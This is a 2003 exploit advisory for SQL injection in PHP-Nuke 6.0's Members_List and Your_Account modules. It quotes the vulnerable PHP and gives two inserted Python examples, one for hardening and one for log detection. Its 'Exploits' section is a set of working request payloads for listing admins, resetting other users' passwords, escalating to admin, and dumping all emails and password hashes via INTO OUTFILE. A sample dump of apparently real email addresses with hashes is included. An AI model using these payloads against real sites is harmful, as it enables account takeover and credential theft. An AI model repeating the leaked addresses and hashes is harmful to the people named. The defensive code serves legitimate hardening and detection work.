
phpnuke60.txt
Posted Mar 10, 2003
Authored by Frog Man | Site phpsecure.info

PHP Nuke 6.0 is vulnerable to multiple SQL injection attacks that allow an attacker to list members, list users by user ID, enumerate moderators and administrators, escalate privileges, and more.

tags | exploit, php, sql injection
SHA-256 | fe41573d8793ef04be219cd767b52d76999813cb7aff1ed34330fd4dc79bbdee


Information :
°°°°°°°°°°°°°
Language : PHP
Website : http://www.phpnuke.org
Versions : 6.0 (& 6.5?)
Modules : Members_List, Your_Account
Problem : SQL Injection
PHP Configuration : The injections below work only if magic_quotes_gpc=OFF (quotes in request parameters are not escaped).


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/modules/Members_List/index.php :

------------------------------------------------------------------------
[...]
// $letter, $sortby, $min and $max are taken straight from the request and
// concatenated into the query text without escaping or validation.
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";
$where = "where uname != 'Anonymous' ";

if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
    $where .= "AND uname like '".$letter."%' ";   // $letter lands inside a quoted LIKE pattern

} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
    $where .= "AND uname REGEXP \"^\[1-9]\" ";

} else {
    $where .= "";
}
$sort = "order by $sortby";                        // $sortby is used as a bare column name
$limit = " ASC LIMIT ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);

$result = sql_query($select.$where.$sort.$limit, $dbi) or die();


echo "<br>";
if ( $letter != "front" ) {
    echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";
    echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";
    $cols = 4;
[...]
------------------------------------------------------------------------


/modules/Your_Account/index.php :
------------------------------------------------------------------------
// Every argument passed below is a raw request variable.
switch($op) {
[...]
    case "mailpasswd":
        mail_password($uname, $code);
        break;

    case "userinfo":
        userinfo($uname, $bypass, $hid, $url);
        break;

    case "login":
        login($uname, $pass);
        break;
[...]
    case "saveuser":
        saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
                 $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
                 $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
        break;
[...]
    case "savehome":
        savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson);
        break;

    case "savetheme":
        savetheme($uid, $theme);
        break;
[...]
    case "savecomm":
        savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
        break;
[...]
}
------------------------------------------------------------------------


/modules/Your_Account/index.php :
------------------------------------------------------------------------
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
                  $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
                  $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
    global $user, $cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    // This check only proves the caller is logged in as $uid; it says nothing
    // about the content of the other parameters, which reach the UPDATE unescaped.
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        if (!eregi("http://", $url)) {
            $url = "http://$url";
        }
        if ((isset($pass)) && ("$pass" != "$vpass")) {
            echo "<center>"._PASSDIFFERENT."</center>";
        } elseif (($pass != "") && (strlen($pass) < $minpass)) {
            echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>";
        } else {
            if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); }
            if ($pass != "") {
                cookiedecode($user);
                sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
                $pass = md5($pass);
                sql_query("update ".$user_prefix."_users set name='$realname',
                    email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' ,
                    user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',
                    user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',
                    user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',
                    newsletter='$newsletter' where uid='$uid'", $dbi);
                $result = sql_query("select uid, uname, pass, storynum, umode, uorder,
                    thold, noscore, ublockon, theme from ".$user_prefix."_users where
                    uname='$uname' and pass='$pass'", $dbi);
                if(sql_num_rows($result, $dbi)==1) {
                    $userinfo = sql_fetch_array($result, $dbi);
                    docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
                } else {
                    echo "<center>"._SOMETHINGWRONG."</center><br>";
                }
                sql_query("UNLOCK TABLES", $dbi);
            } else {
                sql_query("update ".$user_prefix."_users set name='$realname',
                    email='$email', femail='$femail', url='$url', bio='$bio',
                    user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',
                    user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',
                    user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',
                    newsletter='$newsletter' where uid='$uid'", $dbi);
                if ($attach) {
                    $a = 1;
                } else {
                    $a = 0;
                }
            }
            Header("Location: modules.php?name=$module_name");
        }
    }
}
[...]
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        if(isset($ublockon)) $ublockon=1; else $ublockon=0;
        $ublock = FixQuotes($ublock);
        // $storynum, $broadcast and $popmeson are interpolated unescaped.
        sql_query("update ".$user_prefix."_users set storynum='$storynum',
            ublockon='$ublockon', ublock='$ublock', broadcast='$broadcast',
            popmeson='$popmeson' where uid='$uid'", $dbi);
        getusrinfo($user);
        docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
        Header("Location: modules.php?name=$module_name");
    }
}

function savetheme($uid, $theme) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        // $theme is interpolated unescaped; the WHERE clause can be overridden from it.
        sql_query("update ".$user_prefix."_users set theme='$theme' where uid='$uid'", $dbi);
        getusrinfo($user);
        docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
        Header("Location: modules.php?name=$module_name&theme=$theme");
    }
}
[...]
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) {
    global $user, $cookie, $userinfo, $user_prefix, $dbi, $module_name;
    cookiedecode($user);
    $check = $cookie[1];
    $check2 = $cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname='$check'", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        if(isset($noscore)) $noscore=1; else $noscore=0;
        // $umode, $uorder, $thold and $commentmax are interpolated unescaped.
        sql_query("update ".$user_prefix."_users set umode='$umode',
            uorder='$uorder', thold='$thold', noscore='$noscore',
            commentmax='$commentmax' where uid='$uid'", $dbi);
        getusrinfo($user);
        docookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
        Header("Location: modules.php?name=$module_name");
    }
}
[...]
------------------------------------------------------------------------



/modules/Your_Account/index.php :
------------------------------------------------------------------------
[...]
function mail_password($uname, $code) {
    global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name;
    // $uname comes from the request and is embedded unescaped in the WHERE clause.
    $result = sql_query("select email, pass from ".$user_prefix."_users where (uname='$uname')", $dbi);
    if(!$result) {
        include("header.php");
        OpenTable();
        echo "<center>"._SORRYNOUSERINFO."</center>";
        CloseTable();
        include("footer.php");
[...]
------------------------------------------------------------------------


------------------------------------------------------------------------
[...]
function userinfo($uname, $bypass=0, $hid=0, $url=0) {
    global $user, $cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,
           $broadcast_msg, $my_headlines, $module_name;
    // $uname is embedded unescaped; no login is required to reach this function.
    $result = sql_query("select uid, femail, url, bio, user_avatar,
        user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,
        user_sig, pass, newsletter from ".$user_prefix."_users where
        uname='$uname'", $dbi);
    $userinfo = sql_fetch_array($result, $dbi);
[...]
------------------------------------------------------------------------



------------------------------------------------------------------------
[...]
function login($uname, $pass) {
    global $setinfo, $user_prefix, $dbi, $module_name;
    // $uname is embedded unescaped before the password is ever compared.
    $result = sql_query("select pass, uid, storynum, umode, uorder, thold,
        noscore, ublockon, theme, commentmax from ".$user_prefix."_users where
        uname='$uname'", $dbi);
    $setinfo = sql_fetch_array($result, $dbi);
[...]
}
[...]
------------------------------------------------------------------------
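As an added illustration, not part of the advisory or of PHP-Nuke's own code, the following Python script rebuilds the Members_List SELECT and the savetheme UPDATE shown above over an in-memory SQLite table, once with the original string concatenation and once hardened. The table layout, the sample rows, the `nuke_` prefix and the column whitelist are constructed for the example; MySQL's REGEXP is replaced by SQLite's GLOB. The hardened versions bind user data as parameters, restrict `sortby` to the columns the module actually displays, and validate `letter` against the only shapes the code expects.

```python
import re
import sqlite3

# Constructed sample data for this example: the columns the advisory's queries
# touch, plus a theme column for the savetheme() case. Values are made up.
USERS = [
    (1, "Admin", "Admin", "admin@example.invalid", "", 4, "hash_admin", "DeepBlue"),
    (2, "Bob", "Bob", "bob@example.invalid", "", 1, "hash_bob", "DeepBlue"),
    (3, "Carol", "carol", "carol@example.invalid", "", 2, "hash_carol", "DeepBlue"),
    (4, "Leet", "1337", "leet@example.invalid", "", 1, "hash_leet", "DeepBlue"),
    (5, "Anonymous", "Anonymous", "", "", 0, "", "DeepBlue"),
]

# Only the columns Members_List displays may be used for ordering.
ALLOWED_SORT = {"uid", "name", "uname", "femail", "url"}


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE nuke_users (uid INTEGER, name TEXT, uname TEXT, "
               "femail TEXT, url TEXT, user_level INTEGER, pass TEXT, theme TEXT)")
    db.executemany("INSERT INTO nuke_users VALUES (?,?,?,?,?,?,?,?)", USERS)
    return db


def members_list_vulnerable(db, letter, sortby="uname"):
    """Mirrors the concatenation in modules/Members_List/index.php:
    $letter lands inside a quoted LIKE pattern, $sortby lands unquoted."""
    where = "where uname != 'Anonymous' "
    if letter not in ("Other", "All"):
        where += "AND uname like '" + letter + "%' "
    elif letter == "Other":
        where += "AND uname GLOB '[1-9]*' "      # SQLite stand-in for the REGEXP branch
    sql = ("select uid, name, uname, femail, url from nuke_users "
           + where + "order by " + sortby)
    return db.execute(sql).fetchall()


def check_members_list_input(letter, sortby):
    """Return None if the request parameters are acceptable, else a reason.
    letter is one ASCII letter or one of the two keywords; sortby must be a
    whitelisted column name, because an identifier cannot be bound as a parameter."""
    if letter not in ("Other", "All") and not re.fullmatch(r"[A-Za-z]", letter):
        return "letter must be a single ASCII letter, 'Other' or 'All'"
    if sortby not in ALLOWED_SORT:
        return "sortby is not a displayable column"
    return None


def members_list_hardened(db, letter, sortby="uname", limit=50, offset=0):
    """Same query with validated identifiers and bound values."""
    problem = check_members_list_input(letter, sortby)
    if problem:
        raise ValueError(problem)
    sql = "select uid, name, uname, femail, url from nuke_users where uname != 'Anonymous' "
    params = []
    if letter not in ("Other", "All"):
        sql += "AND uname like ? "
        params.append(letter + "%")              # user data travels as a bound value
    elif letter == "Other":
        sql += "AND uname GLOB '[1-9]*' "
    sql += "order by " + sortby + " ASC LIMIT ? OFFSET ?"   # sortby already whitelisted
    params += [int(limit), int(offset)]
    return db.execute(sql, params).fetchall()


def savetheme_vulnerable(db, uid, theme):
    """Mirrors savetheme() in modules/Your_Account/index.php: the caller's uid
    is verified, but $theme is spliced into the UPDATE unescaped."""
    db.execute("update nuke_users set theme='" + theme + "' where uid='" + str(uid) + "'")


def savetheme_hardened(db, uid, theme):
    """Bound parameters: the theme value can never become part of the SET list
    or the WHERE clause. Returns the number of rows updated."""
    return db.execute("update nuke_users set theme=? where uid=?",
                      (theme, int(uid))).rowcount


def get_user(db, uid):
    """(uname, user_level, theme) for one uid, to observe each update's effect."""
    return db.execute("select uname, user_level, theme from nuke_users where uid=?",
                      (int(uid),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "',user_level='4"                  # the advisory's savetheme payload
    savetheme_hardened(db, 2, payload)
    print("hardened:  ", get_user(db, 2))        # theme is the literal string, level unchanged
    savetheme_vulnerable(db, 2, payload)
    print("vulnerable:", get_user(db, 2))        # level is now 4
```

The `sortby` case is the one a parameterised query alone does not solve: a column name is an identifier, so the only safe construction is a whitelist of the columns the page is meant to expose, which also closes the "order by crypted pass" disclosure.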




Exploits :
°°°°°°°°°°
Members_List :
- Show users, ordered by hashed password :
http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- Show users, ordered by UID :
http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- Show moderators :
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*

- Show administrators :
http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*

- Show all users whose password hash begins with 'abc' :
http://[target]/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'abc%25'/*

- Etc...


Your_Account :
- Change the name of the 'Admin' user to "hophophop" :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',name='Hophophop'%20where%20uname='Admin'/*&uid=[OUR_UID]

- Change Bob's password to the value whose MD5 hash is
'd41d8cd98f00b204e9800998ecf8427e' :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&realname=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&email=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&storynum=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&umode=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&thold=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]


or...or... and or again :p


- Change our own account's user level to the admin level :
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&femail=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=',user_level='4&uid=[OUR_UID]
or :
http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=',user_level='4&uid=[OUR_UID]
or etc...




- Save every user's email address and password hash into
http://[target]/AllMailPass.txt :

http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path/to/site]/AllMailPass.txt'/*

http://[target]/AllMailPass.txt will then contain something like :
--------------------------------------------------------
chaeyut@yahoo.com a34e83e6658923ceb100abb52cd31df6
for-ever@yahoo.com 5728cea4924d9097c78d08165ad1dd8a
runbur@netzero.com 546fa9501a436d4615b798f856386ba8
venom@yahoo.com 614edfbc874f09d75b98240295a8f39f
gotchakd@yahoo.de fbd125e74581979d2b7fc6e2b360e286
cfischer@mindspring.com 9407c826d8e3c07ad37cb2d13d1cb641
mike@xiradio.com f9ac6b05beccb0fc5837b6a7fef4c1d3
mikdif@yahoo.com 6106edf3e22b0cd8609fa1112d0ae962
mcurry@hotmail.com 739897be3e14cf5a9fb032069f522b77
--------------------------------------------------------

(the password hash can be presented in the cookie to access the account).


- Save the information about users whose uid is between 190 and 196
into http://[target]/1.txt :

http://[target]/modules.php?name=Your_Account&op=userinfo&uname='%20OR%20uid>190%20AND%20uid<196%20INTO%20OUTFILE%20'/[path/to/site]/1.txt



- Save all information about admins, moderators, ... into
http://[target]/admin.txt :

http://[target]/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/[path/to/site]/admin.txt



etc etc ... !


[path/to/site] can be found (for example) on
http://[target]/modules/Forums/bb_smilies.php (Path Disclosure Security
Hole).
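For detection rather than patching, here is an added Python example (not from the advisory) that scans Apache-style access log lines for the request shapes listed above: a quote followed by a clause-level token or a comment opener in a decoded parameter value, an INTO OUTFILE keyword, a `sortby` outside the displayed columns, a `letter` that is not a single letter or keyword, or a non-numeric `uid`. The log lines, client addresses, timestamps and the `[path]` placeholder are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines for this example (hosts, times and
# byte counts are made up); the query strings follow the shapes in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2003:10:01:02 +0100] "GET /modules.php?name=Members_List&letter=B HTTP/1.0" 200 5120
10.0.0.5 - - [10/Mar/2003:10:01:09 +0100] "GET /modules.php?name=Members_List&letter=All&sortby=pass HTTP/1.0" 200 9120
10.0.0.9 - - [10/Mar/2003:10:02:31 +0100] "GET /modules.php?name=Members_List&letter='%20OR%20user_level='4'/* HTTP/1.0" 200 2210
10.0.0.9 - - [10/Mar/2003:10:03:40 +0100] "GET /modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=42 HTTP/1.0" 302 0
10.0.0.9 - - [10/Mar/2003:10:05:12 +0100] "GET /modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path]/x.txt'/* HTTP/1.0" 200 800
10.0.0.7 - - [10/Mar/2003:10:06:00 +0100] "GET /modules.php?name=Your_Account&op=savetheme&theme=DeepBlue&uid=42 HTTP/1.0" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Columns Members_List displays; anything else in sortby is not a legitimate request.
ALLOWED_SORT = {"uid", "name", "uname", "femail", "url"}
LETTER_OK = re.compile(r"^(?:[A-Za-z]|Other|All|front)$")

# A quote followed by a clause-level token, a block-comment opener, or an
# OUTFILE/UNION keyword anywhere in a decoded value.
SQL_META = re.compile(r"""(?i)['"]\s*(?:\)|,|or\b|and\b|where\b)|/\*|\bINTO\s+OUTFILE\b|\bUNION\b""")


def parse_line(line):
    """Split one log line into client, timestamp, path, percent-decoded query
    parameters and status; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "params": parse_qsl(parts.query, keep_blank_values=True),
        "status": int(m.group("status")),
    }


def classify(event):
    """Reasons an event matches the advisory's injection shapes; empty if none."""
    reasons = []
    if event is None or event["path"] != "/modules.php":
        return reasons
    params = dict(event["params"])
    for key, value in event["params"]:
        if SQL_META.search(value):
            reasons.append(f"{key}: SQL metacharacters in value")
    if params.get("name") == "Members_List":
        if "letter" in params and not LETTER_OK.match(params["letter"]):
            reasons.append("letter: not a single letter or keyword")
        if "sortby" in params and params["sortby"] not in ALLOWED_SORT:
            reasons.append("sortby: column outside the displayed set")
    if params.get("name") == "Your_Account" and "uid" in params and not params["uid"].isdigit():
        reasons.append("uid: not numeric")
    return reasons


def scan(log_text):
    """(client, timestamp, reasons) for every line that trips at least one check."""
    hits = []
    for line in log_text.splitlines():
        event = parse_line(line)
        reasons = classify(event)
        if reasons:
            hits.append((event["ip"], event["ts"], reasons))
    return hits


if __name__ == "__main__":
    for ip, ts, reasons in scan(SAMPLE_LOG):
        print(ip, ts, "; ".join(reasons))
```

The parameter-shape checks (`letter`, `sortby`, `uid`) are the ones worth keeping after the application is patched: they catch probing that a generic quote-and-keyword pattern misses, such as ordering the member list by a column that is never displayed.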


Solution :
°°°°°°°°°°
A patch has been created and published on http://www.phpsecure.info .


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHP-Nuke6.0-Members_List-Your_Account.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



Credits :
°°°°°°°°°
Greetz to T. Rodriguez, [RaFa], Webotheque.be
Author : frog-m@n
http://www.phpsecure.info .

